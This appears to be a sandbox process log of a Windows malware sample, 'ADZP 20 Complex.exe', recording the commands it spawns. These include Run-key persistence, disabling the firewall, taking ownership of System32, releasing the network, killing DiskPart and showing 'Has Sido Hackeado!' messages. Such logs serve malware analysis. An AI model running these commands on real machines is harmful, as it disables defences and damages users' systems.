C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B5C3.tmp\C092.tmp\C093.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A98E.tmp\C0E0.tmp\C0E1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FF9D.tmp\FF9E.tmp\FFBF.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1A1.tmp\1A2.tmp\1A3.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\635.tmp\636.tmp\637.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\683.tmp\684.tmp\685.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2E3F.tmp\2E40.tmp\2E41.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\SysWOW64\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F68.tmp\2F88.tmp\2F89.bat C:\Windows\SysWOW64\Twain_20.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2FF4.tmp\2FF5.tmp\2FF6.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4EB7.tmp\4EB8.tmp\4EB9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6220.tmp\6221.tmp\6222.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\73A4.tmp\73B5.tmp\73B6.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B9E5.tmp\B9E6.tmp\B9E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BACF.tmp\BAD0.tmp\BAD1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF26.tmp\BF26.tmp\BF27.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF25.tmp\BF26.tmp\BF27.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CD1F.tmp\CD20.tmp\CD21.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EAD8.tmp\EAD9.tmp\EADA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F9AD.tmp\F9BE.tmp\F9BF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1582.tmp\1583.tmp\1584.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\303E.tmp\30EB.tmp\30EC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\385C.tmp\385D.tmp\385E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
Network
Files